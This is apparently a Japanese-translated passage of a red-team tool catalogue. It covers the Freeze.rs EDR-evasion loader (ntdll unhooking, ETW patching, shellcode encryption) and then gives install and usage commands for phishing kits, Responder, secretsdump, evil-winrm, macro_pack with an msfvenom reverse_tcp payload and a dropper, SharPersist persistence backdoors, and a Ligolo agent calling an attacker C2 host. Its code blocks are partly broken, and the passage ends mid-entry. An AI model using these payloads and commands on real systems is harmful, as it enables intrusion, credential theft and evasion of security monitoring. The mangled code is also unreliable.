このクリーンな中断プロセスを使用してFreeze.rsローダーからフックを除去するには、プログラム的にクリーンな中断プロセスのメモリを見つけ、読み取る方法が必要です。ここでアドレス空間配置のランダム化(ASLR)が役立ちます。ASLRはスタックメモリの破損に基づく脆弱性を防ぐためのセキュリティ機構です。ASLRはプロセス内のアドレス空間をランダム化し、すべてのメモリマップドオブジェクト、スタック、ヒープ、実行可能プログラム自体が一意になるようにします。ここで興味深いのは、ASLRが機能する一方で、DLLのような位置独立コードには機能しないことです。DLL(特に既知のシステムDLL)では、アドレス空間はブート時に一度だけランダム化されます。つまり、制御下にあるプロセスを含むすべてのプロセスで、ntdll.dllのベースアドレスは同じであるため、リモートプロセスの情報を列挙してntdll.dllのベースアドレスを見つける必要はありません。すべてのDLLのアドレスはブートごとに同じ場所にあるため、この情報を自分自身のプロセスから取得でき、中断プロセスを列挙してアドレスを見つける必要はありません。

この情報を使用して、API ReadProcessMemoryを利用してプロセスのメモリを読み取ることができます。このAPI呼び出しは、資格情報ベースの攻撃の一環としてLSASSを読み取ることとよく関連付けられますが、それ自体は本質的に悪意のあるものではありません。特に、メモリの任意のセクションを読み取るだけならなおさらです。ReadProcessMemoryが怪しいものとしてフラグされるのは、読み取るべきではないもの(LSASSの内容など)を読み取る場合のみです。EDR製品は、ReadProcessMemoryが呼び出されたこと自体をフラグにしてはなりません。この関数には正当な運用上の用途があり、多くの誤検出を引き起こすからです。
さらに一歩進めて、DLL全体を読み取るのではなく、すべてのシステムコールが格納されているNtdll.dllの.textセクションのみを読み取ることもできます。
これらの要素を組み合わせることで、シェルコードを実行する前に、既存のフックされた.textセクションを上書きするために、Ntdll.dllの.textセクションのコピーをプログラム的に取得できます。
**ETWパッチ**
ETWは組み込みのシステムコールを利用してこのテレメトリを生成します。ETWもWindowsに組み込まれたネイティブ機能であるため、セキュリティ製品は情報にアクセスするためにETWシステムコールを「フック」する必要はありません。その結果、ETWを防ぐために、Freeze.rsは多数のETWシステムコールにパッチを適用し、レジスタをフラッシュして実行フローを次の命令に戻します。ETWへのパッチ適用は現在、すべてのローダーでデフォルトとなっています。
**シェルコード**

RustのNTAPIクレートを使用すると、これらの呼び出しがntdll.dllに表示されないことがわかりますが、プロセス内には依然として存在しています。

その結果:


**なぜRustなのか?**
これはRustを学ぶための楽しいプロジェクトとして始まり、独自のフレームワークに成長しました。
**貢献**
Freeze.rsはRustで開発されました。
**インストール**
RustとRustupがインストールされていない場合は、インストールしてください。OSXまたはLinuxからコンパイルする場合は、ターゲット「x86_64-pc-windows-gnu」が追加されていることを確認してください。そのためには、次のコマンドを実行します:
完了したら、Freeze.rsをコンパイルできます。次のコマンドを実行するか、コンパイル済みのバイナリを使用してください:```bash
git clone https://github.com/optiv/Freeze
cd Freeze
rustup target add x86_64-pc-windows-gnu
cargo build --release
そこから、コンパイルされたバージョンは target/release にあります (注意: --release を付けない場合、ファイルは target/debug/ )```bash
___________
_ /_ ____ ____ ________ ____ _______ ______
| ) _ __ _/ __ _/ __ \_ // __ \ _ __ / /
| \ | | /\ /\ / / /\ / | | /_
_ / || _ >_ >___ \___ > /\ |__| /____ >
/ / / / / / /
(@Tyl0us)
Soon they will learn that revenge is a dish... best served COLD & Rusty...
USAGE: Freeze-rs [FLAGS] [OPTIONS]
FLAGS: -c, --console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature -h, --help Prints help information -n, --noetw Disables the ETW patching that prevents ETW events from being generated. -s, --sandbox Enables sandbox evasion by checking: Is Endpoint joined to a domain? Does the Endpoint have more than 2 CPUs? Does the Endpoint have more than 4 gigs of RAM? -V, --version Prints version information
OPTIONS: -E, --Encrypt Encrypts the shellcode using either AES 256, ELZMA or RC4 encryption -I, --Input Path to the raw 64-bit shellcode. -O, --Output Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe. -p, --process The name of process to spawn. This process has to exist in C:\Windows\System32. Example 'notepad.exe' -e, --export Defines a custom export function name for any DLL.
**バイナリとDLL**
Freeze.rsは.exeファイルまたは.dllファイルのいずれかを生成できます。これを指定するには、-Oコマンドラインオプションの末尾がバイナリの場合は.exe、DLLの場合は.dllとなるようにしてください。現在、他のファイルタイプはサポートされていません。DLLファイルの場合、Freeze.rsは追加のエクスポート機能を追加することもできます。これを行うには、-exportを使用して特定のエクスポート関数名を指定します。
**暗号化**
シェルコードを暗号化することは、EDRやその他のセキュリティ製品による検出や分析から保護するための重要な技術です。Freeze.rsにはシェルコードを暗号化するための複数の方法が用意されており、AES、ELZMA、RC4などがあります。
**AES**
AES(Advanced Encryption Standard)は、データを暗号化するために広く使用されている対称暗号化アルゴリズムです。Freeze.rsはAES-256ビットサイズを使用してシェルコードを暗号化します。AESを使用してシェルコードを暗号化する利点は、強力な暗号化を提供し、暗号化ライブラリで広くサポートされていることです。ただし、固定ブロックサイズを使用すると、パディングオラクル攻撃などの特定の攻撃に対して脆弱になる可能性があります。
**ELZMA**
ELZMAは、コードを難読化するためにマルウェアでよく使用される圧縮および暗号化アルゴリズムです。ELZMAを使用してシェルコードを暗号化するには、まずシェルコードをELZMAアルゴリズムで圧縮します。次に、圧縮されたデータをランダムなキーで暗号化します。暗号化されたデータとキーは、エクスプロイトコードに埋め込まれます。ELZMAを使用してシェルコードを暗号化する利点は、単一のアルゴリズムで圧縮と暗号化の両方を提供することです。これにより、エクスプロイトコードのサイズを削減し、検出を困難にすることができます。
**RC4**
RC4は、マルウェアでシェルコードを暗号化するためによく使用される対称暗号化アルゴリズムです。可変長のキーを使用できるストリーム暗号であり、そのシンプルさと速度で知られています。
**コンソール**
Freeze.rsは、最初にプロセスを作成し、その後バックグラウンドに移行する手法を利用します。これにより、2つのことが行われます。1つはプロセスを隠蔽しやすくすること、もう1つはEDR製品による検出を回避することです。すぐにバックグラウンドでプロセスを起動することは非常に疑わしく、悪意のある兆候となる可能性があります。Freeze.rsは、プロセスが作成されEDRのフックがロードされた後に、Windows関数の‘GetConsoleWindow’と‘ShowWindow’を呼び出し、ウィンドウ属性を非表示に変更することでこれを実現します。
-consoleコマンドラインオプションが選択された場合、Freeze.rsはプロセスをバックグラウンドに隠蔽しません。代わりに、Freeze.rsはローダーが何を行っているかを示すいくつかのデバッグメッセージを追加します。
### [🔙](#tool-list)WSH
**ペイロードの作成:**```vbs
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True
実行:```bash wscript payload.vbs cscript.exe payload.vbs wscript /e:VBScript payload.txt //If .vbs files are blacklisted
### [🔙](#tool-list)HTA
**ペイロードの作成:**```html
<html>
<body>
<script>
var c = "cmd.exe";
new ActiveXObject("WScript.Shell").Run(c);
</script>
</body>
</html>
Execute: ファイルを実行
Creating payload: ペイロードの作成:```python Sub calc() Dim payload As String payload = "calc.exe" CreateObject("Wscript.Shell").Run payload,0 End Sub
**実行:** マクロ有効ドキュメントでAuto_Open()関数を設定する
# 初期アクセス
### [🔙](#tool-list)[Bash Bunny](https://shop.hak5.org/products/bash-bunny)
Bash Bunnyは物理的なUSB攻撃ツールであり、多機能ペイロード配信システムです。コンピュータのUSBポートに差し込むように設計されており、データの操作や抽出、マルウェアのインストール、セキュリティ対策の回避など、さまざまな機能を実行するようにプログラムできます。
[hackinglab: Bash Bunny – ガイド](https://hackinglab.cz/en/blog/bash-bunny-guide/)
[Hak5 ドキュメント](https://docs.hak5.org/bash-bunny/)
[優れたペイロードリポジトリ](https://github.com/hak5/bashbunny-payloads)
[製品ページ](https://hak5.org/products/bash-bunny)

### [🔙](#tool-list)[EvilGoPhish](https://github.com/fin3ss3g0d/evilgophish)
evilginx2 + gophish。(GoPhish) Gophishは強力なオープンソースのフィッシングフレームワークで、組織のフィッシングに対する露出を簡単にテストできます。(evilginx2) スタンドアロンのman-in-the-middle攻撃フレームワークで、フィッシングログイン認証情報とセッションクッキーを取得し、2要素認証をバイパスするために使用されます。
**インストール:**```bash
git clone https://github.com/fin3ss3g0d/evilgophish
使用方法:``` Usage: ./setup <subdomain(s)>

### [🔙](#tool-list)[Social Engineer Toolkit (SET)](https://github.com/IO1337/social-engineering-toolkit)
このフレームワークは初期アクセスのキャンペーン作成に優れており、「SETは、信頼性の高い攻撃を迅速に構築できるカスタムアタックベクターを多数備えています」。
**インストール:**```bash
git clone https://github.com/IO1337/social-engineering-toolkit; cd set; python setup.py install
使用方法:```bash python3 setoolkit

### [🔙](#tool-list)[Hydra](https://github.com/vanhauser-thc/thc-hydra)
ログオンに対するブルートフォース攻撃に便利なツールです。SSH、FTP、TELNET、HTTPなどの多くのサービスに対してbf攻撃が可能です。
**インストール:**```bash
sudo apt install hydra
使用方法:```bash hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form "login.php:username-^USER^&password=^PASS^:Error" hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh

### [🔙](#tool-list)[SquarePhish](https://github.com/secureworks/squarephish)
SquarePhish は、OAuth デバイスコード認証フローと QR コードを組み合わせた手法を使用する高度なフィッシングツールです (フィッシング攻撃における OAuth デバイスコードフローの詳細については、[PhishInSuits](https://github.com/secureworks/PhishInSuits) を参照してください)。
攻撃手順:
- 被害者に悪意のあるQRコードを送信する
- 被害者がモバイル端末でQRコードをスキャンする
- 被害者が攻撃者制御のサーバーに誘導される (OAuth デバイスコード認証フロープロセスをトリガー)
- 被害者にMFAコードがメールで送信される (OAuth デバイスコードフローの15分タイマーをトリガー)
- 攻撃者が認証をポーリングする
- 被害者が正規のMicrosoftウェブサイトにコードを入力する
- 攻撃者が認証トークンを保存する
**インストール:**```bash
git clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt
注意: どちらのモジュールを使用する前に、settings.config ファイル内の Required と記された必要な情報を更新してください。
使用法(メールモジュール):``` usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]
optional arguments: -h, --help show this help message and exit
-c CONFIG, --config CONFIG squarephish config file [Default: settings.config]
--debug enable server debugging
-e EMAIL, --email EMAIL victim email address to send initial QR code email to
**使用方法 (サーバーモジュール):**```
usage: squish.py server [-h] [-c CONFIG] [--debug]
optional arguments:
-h, --help show this help message and exit
-c CONFIG, --config CONFIG
squarephish config file [Default: settings.config]
--debug enable server debugging

King Phisherは、攻撃者が被害者にフィッシングメールを作成・送信し、機密情報を取得するためのツールです。
カスタマイズ可能なテンプレート、キャンペーン管理、メール送信機能などの機能を備えており、フィッシング攻撃を実行するための強力で使いやすいツールです。King Phisherを使用することで、攻撃者は個人や組織を対象に、的を絞った説得力のあるフィッシングメールを送信でき、攻撃の成功率を高めることができます。
インストール(Linux - クライアント&サーバー):```bash
wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh &&
sudo bash ./install.sh
**使い方:**
King Phisherがインストールされたら、[Wikiページ](https://github.com/rsmusllp/king-phisher/wiki/Getting-Started)に従ってSSH、Database config、SMTPサーバなどの設定を行ってください。

# 実行
### [🔙](#tool-list)[Responder](https://github.com/SpiderLabs/Responder)
Responderは、ネットワーク上でLLMNRおよびNBT-NSプロトコルをポイズニングし、認証情報の取得と任意のコード実行を可能にするツールです。
LLMNR(Link-Local Multicast Name Resolution)およびNBT-NS(NetBIOS Name Service)プロトコルは、Windowsシステムがローカルネットワーク上でホスト名をIPアドレスに解決するために使用されます。これらのプロトコルを使用してホスト名を解決できない場合、システムはローカルネットワークにホスト名の要求をブロードキャストします。
Responderはこれらのブロードキャストを待ち受け、偽のIPアドレスで応答することで、要求元システムを騙して認証情報を攻撃者に送信させます。
**インストール:**```bash
git clone https://github.com/SpiderLabs/Responder#usage
cd Responder
使用方法:```bash
./Responder.py [options]
./Responder.py -I eth0 -wrf
Full usage information can be found [here](https://github.com/SpiderLabs/Responder#usage).

_画像は https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/ より引用_
### [🔙](#tool-list)[secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py)
Impacket ライブラリの一部であるユーティリティで、Windows システムからパスワードハッシュやその他のシークレットを抽出するために使用されます。
これは、システム上の Security Account Manager (SAM) データベースと対話し、ハッシュ化されたパスワードや以下のような情報を抽出することで実現します。
- ローカルアカウントのパスワードハッシュ
- Kerberos チケットとキー
- LSA シークレット
**インストール:**```bash
python3 -m pip install impacket
使い方:```bash
secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL
secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:[email protected]

_画像提供元: https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy_
### [🔙](#tool-list)[evil-winrm](https://github.com/Hackplayers/evil-winrm)
Evil-WinRM は、Windows Remote Management (WinRM: _管理者がWindowsマシン上でリモートからコマンドを実行できるようにするサービス_) のためのコマンドラインインターフェースを提供するツールです。
Evil-WinRM は攻撃者が WinRM を使用して Windows マシンにリモート接続し、任意のコマンドを実行することを可能にします。
主な機能は以下の通りです:
- Powershell スクリプトのメモリへのロード
- 一部の AV を回避する dll ファイルのメモリへのロード
- x64 ペイロードのロード
- Pass-the-hash のサポート
- ローカルおよびリモートファイルのアップロード・ダウンロード
**インストール: (Git)**```bash
sudo gem install winrm winrm-fs stringio logger fileutils
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm
インストール: (Ruby gem)```bash gem install evil-winrm
別のインストール手順は[こちら](https://github.com/Hackplayers/evil-winrm#installation--quick-start-4-methods)で確認できます。
**使用方法:**```bash
# Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations
evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
# Upload local files to victim
upload local_filename
upload local_filename destination_filename
# Download remote files to local machine
download remote_filename
download remote_filename destination_filename
# Execute .Net assembly into victim memory
Invoke-Binary /opt/csharp/Rubeus.exe
# Load DLL library into victim memory
Dll-Loader -http http://10.10.10.10/SharpSploit.dll
完全な使用ドキュメントはこちらにあります。

画像は https://korbinian-spielvogel.de/posts/heist-writeup/ から使用
VBScript、JScript、EXE、DLLファイル、およびdotNETアセンブリをメモリ内で実行するためのツールです。ファイルをディスクに書き込むことなく、カスタムペイロードをターゲットシステムに読み込んで実行できます。
インストール:(Windows)```bash git clone http://github.com/thewover/donut.git
ローダーテンプレート、動的ライブラリ donut.dll、静的ライブラリ donut.lib、およびジェネレータ donut.exe を生成するには、x64 Microsoft Visual Studio Developer コマンドプロンプトを起動し、Donut リポジトリをクローンしたディレクトリに移動して、次のように入力します。```bash
nmake -f Makefile.msvc
同じことを MinGW-64 を Windows または Linux で使用して行うには、Donut リポジトリをクローンしたディレクトリに移動し、次のように入力します。```bash make -f Makefile.mingw
**インストール: (Linux)**```bash
pip3 install donut-shellcode
使用方法:```bash
shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\calc.xsl")
shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\payload\test\hello.dll")
全体的な使い方については、donutの[GitHubページ](https://github.com/TheWover/donut/#4-usage)を参照してください。
詳しくは、The Woverによる[最近のブログ記事](https://thewover.github.io/Bear-Claw/)をご覧ください。

### [🔙](#tool-list)[Macro_pack](https://github.com/sevagas/macro_pack)
レッドチーム向けに、Office文書、VBスクリプト、ショートカット、その他の形式の難読化と生成を自動化するためのツールです。
**インストール: (バイナリ)**
1. 最新のバイナリを[https://github.com/sevagas/macro_pack/releases/](https://github.com/sevagas/macro_pack/releases/)から入手してください。
2. 正規のMicrosoft OfficeがインストールされているPCにバイナリをダウンロードします。
3. コンソールを開き、CDでバイナリディレクトリに移動し、バイナリを実行します。
**インストール: (Git)**```bash
git clone https://github.com/sevagas/macro_pack.git
cd macro_pack
pip3 install -r requirements.txt
使い方:```bash
python3 macro_pack.py --help
macro_pack.exe --listformats
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba
macro_pack.exe -f empire.vba -o -G myDoc.docm
echo "https://myurl.url/payload.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER -G "drop.xlsm"
echo calc.exe | macro_pack.exe --dde -G calc.xslx

### [🔙](#tool-list)[PowerSploit](https://github.com/PowerShellMafia/PowerSploit)
PowerShellスクリプトとモジュールのコレクションで、さまざまなレッドチーム活動の目的を達成するために使用できます。
PowerSploitの機能の一部:
- パスワードハッシュのダンプとメモリからの平文パスワードの抽出
- 特権の昇格とセキュリティ制御のバイパス
- 任意のPowerShellコードの実行と実行制限のバイパス
- ネットワーク偵察と発見の実行
- ペイロードの生成とエクスプロイトの実行
**インストール:** _1. PowerShellモジュールフォルダに保存する_
まず、[PowerSploitフォルダ](https://github.com/PowerShellMafia/PowerSploit)をダウンロードし、PowerShellモジュールフォルダに保存する必要があります。
PowerShellモジュールフォルダのパスは、次のコマンドで確認できます:```
$Env:PSModulePath
Install: 2. PowerSploit を PowerShell モジュールとしてインストール
次に、PowerSploit モジュールをインストールする必要があります (ダウンロードしたフォルダの名前を使用します)。
Note: PowerShell の実行ポリシーによってブロックされる可能性があります。これを修正するには、次のコマンドを実行してください。``` powershell.exe -ep bypass
これでPowerSploitモジュールをインストールできます。```
Import-Module PowerSploit
使用方法:``` Get-Command -Module PowerSploit

### [🔙](#tool-list)[Rubeus](https://github.com/GhostPack/Rubeus)
Microsoft Active Directory (AD) 環境に関連するさまざまなアクション(パスワードハッシュのダンプ、ユーザーの作成/削除、ユーザープロパティの変更など)を実行するために使用できるツールです。
Rubeusの機能の一部:
- Kerberoasting
- Golden ticket attacks
- Silver ticket attacks
**インストール: (ダウンロード)**
非公式のプリコンパイル済みRubeusバイナリは[こちら](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe)からインストールできます。
**インストール: (コンパイル)**
Rubeusは[Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/)と互換性があります。rubeusの[プロジェクト .sln](https://github.com/GhostPack/Rubeus)を開き、"Release"を選択してビルドしてください。
**使用方法:**```
Rubeus.exe -h

被害者のエンドポイントをチェックして、高整合性プロセス、グループ、ハイジャック可能なパスなどの脆弱性を検出する便利なツールです。
インストール:(ダウンロード)
非公式のプリコンパイル済みSharpUpバイナリはこちらからインストールできます。
インストール:(コンパイル)
SharpUpはVisual Studio 2015 Community Editionと互換性があります。SharpUpのプロジェクト .slnを開き、「Release」を選択してビルドしてください。
使用方法:```bash SharpUp.exe audit #-> Runs all vulnerability checks regardless of integrity level or group membership.
SharpUp.exe HijackablePaths #-> Check only if there are modifiable paths in the user's %PATH% variable.
SharpUp.exe audit HijackablePaths #-> Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership.

### [🔙](#tool-list)[SQLRecon](https://github.com/skahwah/SQLRecon)
MS-SQL (Microsoft SQL Server) は、Microsoft が開発および販売するリレーショナルデータベース管理システムです。
この C# MS-SQL ツールキットは、攻撃的な偵察とポストエクスプロイテーションのために設計されています。各テクニックの詳細な使用方法については、[wiki](https://github.com/skahwah/SQLRecon/wiki) を参照してください。
**インストール: (バイナリ)**
最新のバイナリリリースは [こちら](https://github.com/skahwah/SQLRecon/releases) からダウンロードできます。
**使用法:**```bash
# Authenticating using Windows credentials
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami
# Authenticating using Local credentials
SQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m whoami
# Authenticating using Azure AD credentials
SQLRecon.exe -a azure -s azure.domain.com -d master -r domain.com -u skawa -p Password123 -m whoami
# Run whoami
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami
# View databases
SQLRecon.exe -a Windows -s SQL01 -d master -m databases
# View tables
SQLRecon.exe -a Windows -s SQL01 -d master -m tables -o AdventureWorksLT2019
完全な使用方法は wiki にあります。
ツールモジュールの使用方法は こちら にあります。

SQLReconヘルプページから使用された画像
このリソースは、AppLocker をバイパスするための最も一般的で既知の手法のコレクションです。
AppLocker はさまざまな方法で構成できるため、@api0cradle は、検証済みのバイパスリスト(デフォルトの AppLocker ルールに対して機能するもの)と、可能なバイパス手法(構成に依存する)または誰かによってバイパスであると主張されているもののリストを管理しています。
また、汎用的なバイパス手法のリストと、DLL を介して実行するためのレガシーな手法のリストもあります。
索引リスト

画像は https://github.com/api0cradle/UltimateAppLockerByPassList から使用されました
独自の埋め込み PowerShell ホスト内で実行される、JavaScript および VBScript ベースの Empire ランチャー。
両方のランチャーは独自の埋め込み PowerShell ホスト内で実行されるため、PowerShell.exe は必要ありません。
これは、企業が PowerShell.exe をブロックしている、またはアプリケーションのホワイトリストソリューションを使用しているが JS/VBS ファイルの実行をブロックしていない場合に役立つ可能性があります。
Usage:
JavaScript バージョンの場合は、以下の変数を使用します。```javascript var EncodedPayload = "";
VBScript版では以下の変数を使用してください:```vbscript
Dim EncodedPayload: EncodedPayload = "<Paste Encoded Launcher Payload Here>"

画像提供元:https://www.hackplayers.com/2017/06/startfighters-un-launcher-de-empire-en-js-vbs.html
このプロジェクトの目的は、暗号化されたHTAファイルを含む.htmlファイルを生成することです。
アイデアは、ターゲットがページにアクセスすると、キーが取得され、ブラウザ内で動的にHTAが復号化され、直接ユーザーにプッシュされるというものです。
これは、一部のセキュリティアプライアンスが実装するコンテンツ/ファイルタイプ検査を回避するための回避技術です。
詳細な技術情報はこちらをご覧ください。
インストール:``` git clone https://github.com/nccgroup/demiguise cd demiguise
**使用法:**```bash
# Generate an encrypted .hta file that executes notepad.exe
python demiguise.py -k hello -c "notepad.exe" -p Outlook.Application -o test.hta

使用元: https://github.com/nccgroup/demiguise
Impacketは、SMB、Kerberos、LDAPを含むさまざまなネットワークプロトコル用の低レベルPythonバインディングと、ネットワークサービスと対話し、パスワードハッシュのダンプやネットワーク共有の作成などの特定のタスクを実行するための高レベルライブラリを提供します。
また、SAMデータベースのダンプ、ドメイン信頼の列挙、Windowsパスワードのクラックなど、さまざまなタスクを実行するためのコマンドラインツールも多数含まれています。
インストール:```bash python3 -m pip install impacket
**インストール:(サンプルスクリプト付き)**
[パッケージ](https://github.com/fortra/impacket) をダウンロードして解凍し、インストールフォルダに移動して実行してください...```bash
python3 -m pip install .
使い方:```bash
secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL
netview.py domain/user:password -target 192.168.10.2
mssqlinstance.py 192.168.1.2
GetADUsers.py domain/user:password@IP
優れた[チートシート](https://cheatsheet.haax.fr/windows-systems/exploitation/impacket/)(Impacket 使用のための)です。

### [🔙](#tool-list)[Empire](https://github.com/EmpireProject/Empire)
Empire は、被害者システムとのリモート接続を確立するためのペイロードを生成できるポストエクスプロイテーションフレームワークです。
被害者システム上でペイロードが実行されると、Empire サーバーへの接続が確立され、その接続を使用してコマンドを発行し、対象システムを制御できます。
Empire には、パスワードハッシュのダンプ、Windows レジストリへのアクセス、データの窃取などの特定のタスクを実行するための組み込みモジュールやスクリプトも多数含まれています。
**インストール:**```bash
git clone https://github.com/EmpireProject/Empire
cd Empire
sudo ./setup/install.sh
使い方:```bash
./empire
list agents
list listeners
便利な使い方の[チートシート](https://github.com/HarmJ0y/CheatSheets/blob/master/Empire.pdf)(作成者:[HarmJoy](https://github.com/HarmJ0y))。

### [🔙](#tool-list)[SharPersist](https://github.com/mandiant/SharPersist)
C#で書かれたWindows永続化ツールキット。
このプロジェクトには[Wiki](https://github.com/mandiant/SharPersist/wiki)があります。
**インストール:(バイナリ)**
最新のリリースは[こちら](https://github.com/mandiant/SharPersist/releases)から入手できます。
**インストール:(コンパイル)**
- [GitHubリポジトリ](https://github.com/mandiant/SharPersist)からプロジェクトファイルをダウンロードします。
- Visual Studioプロジェクトを開き、「ツール」→「NuGet パッケージ マネージャー」→「パッケージ マネージャー設定」に進みます。
- 「NuGet パッケージ マネージャー」→「パッケージ ソース」に進みます。
- URL「https://api.nuget.org/v3/index.json」でパッケージソースを追加します。
- Costura.Fody NuGetパッケージをインストールします。Visual Studio 2019を必要としないために、古いバージョンのCostura.Fody(3.3.3)が必要です。
- `Install-Package Costura.Fody -Version 3.3.3`
- TaskSchedulerパッケージをインストールします。
- `Install-Package TaskScheduler -Version 2.8.11`
- これでプロジェクトを自分でビルドできます!
**使い方:**
使用例の完全なリストは[こちら](https://github.com/mandiant/SharPersist#adding-persistence-triggers-add)にあります。```
#KeePass
SharPersist -t keepass -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m add
#Registry
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add
#Scheduled Task Backdoor
SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add
#Startup Folder
SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add

Ligolo-ngは、ペネトレーションテスターがtunインターフェースを使用してリバースTCP/TLS接続からトンネルを確立できるようにする、シンプルで軽量かつ高速なツールです(SOCKSは不要)。
SOCKSプロキシやTCP/UDPフォワーダーを使用する代わりに、Ligolo-ngはGvisorを使用してユーザーランドネットワークスタックを作成します。
リレー/プロキシサーバーを実行すると、tunインターフェースが使用され、このインターフェースに送信されたパケットが変換され、エージェントのリモートネットワークに送信されます。
インストール: (ダウンロード)
プリコンパイル済みバイナリ(Windows/Linux/macOS)はリリースページから入手できます。
インストール: (ビルド)
Ligolo-ngのビルド(Go >= 1.17が必要):```bash go build -o agent cmd/agent/main.go go build -o proxy cmd/proxy/main.go
GOOS=windows go build -o agent.exe cmd/agent/main.go GOOS=windows go build -o proxy.exe cmd/proxy/main.go
**セットアップ: (Linux)**```bash
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up
セットアップ: (Windows)
Wintun ドライバー (WireGuard で使用) をダウンロードし、wintun.dll を Ligolo と同じフォルダに配置する必要があります (正しいアーキテクチャを使用していることを確認してください)。
セットアップ: (プロキシサーバー)```bash ./proxy -h # Help options ./proxy -autocert # Automatically request LetsEncrypt certificates
**使用法:**
_ターゲット(被害者)のコンピュータ上でエージェントを起動します(権限は必要ありません!):_```bash
./agent -connect attacker_c2_server.com:11601
プロキシサーバーにセッションが表示されるはずです。``` INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"
session コマンドを使用してエージェントを選択します。```
ligolo-ng » session
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000
Full usage information can be found here.

画像の出典: https://github.com/nicocha30/ligolo-ng#demo
LinPEASは、Linuxエンドポイント上のローカル権限昇格(privesc)経路を見つけるための、詳細な情報を提供する優れた権限昇格ツールです。
インストールと使用方法:```bash curl -L "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" | sh

### [🔙](#tool-list)[WinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS)
WinPEAS は、Windows エンドポイント上のローカル特権昇格経路を見つけるための、優れた詳細な特権昇格ツールです。
**インストール + 使用方法:**```bash
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")

Linux smart enumerationは、もう一つの優れた、より簡潔なLinux権限昇格ツールです。
インストール + 使用法:```bash curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh

### [🔙](#tool-list)[Certify](https://github.com/GhostPack/Certify)
Certify は、Active Directory 証明書サービス (AD CS) における設定ミスを列挙し悪用するための C# ツールです。
Certify は、Mimikatz や PowerShell などの他のレッドチームツールやテクニックと組み合わせて使用するように設計されており、レッドチームが中間者攻撃、なりすまし攻撃、権限昇格攻撃など、さまざまな種類の攻撃を実行できるようにします。
**Certify の主な機能:**
- 証明書の作成
- 証明書の署名
- 証明書のインポート
- 証明書の信頼設定の変更
**インストール: (コンパイル)**
Certify は [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/) と互換性があります。Certify プロジェクトの [.sln](https://github.com/GhostPack/Certify) ファイルを開き、"Release" を選択してビルドします。
**インストール: (PowerShell 経由で Certify を実行する)**
Certify を PowerShell ラッパーを通じてメモリ内で実行するには、まず Certify をコンパイルし、結果のアセンブリを base64 エンコードします。```bash
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\Certify.exe")) | Out-File -Encoding ASCII C:\Temp\Certify.txt
Certify は、以下のように PowerShell スクリプトに読み込むことができます("aa..." は base64 エンコードされた Certify アセンブリ文字列に置き換えてください):``` $CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("aa..."))
Main()メソッドと任意の引数は、次のように呼び出すことができます:```
[Certify.Program]::Main("find /vulnerable".Split())
完全なコンパイル手順はこちらにあります。
使用法:```bash
Certify.exe find /vulnerable
Certify.exe request /ca:dc.theshire.local\theshire-DC-CA /template:VulnTemplate /altname:localadmin
完全な例のウォークスルーは[こちら](https://github.com/GhostPack/Certify#example-walkthrough)にあります。

### [🔙](#tool-list)[Get-GPPPassword](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1)
Get-GPPPasswordはPowerSploitツールキットの一部であるPowerShellスクリプトであり、グループポリシーの基本設定(GPP)を使用して作成および管理されるローカルアカウントのパスワードを取得するように設計されています。
Get-GPPPasswordは、ドメインコントローラ上のSYSVOLフォルダ内で、パスワード情報を含むGPPファイルを検索することで動作します。これらのファイルを見つけると、パスワード情報を復号化してユーザーに表示します。
**インストール:**
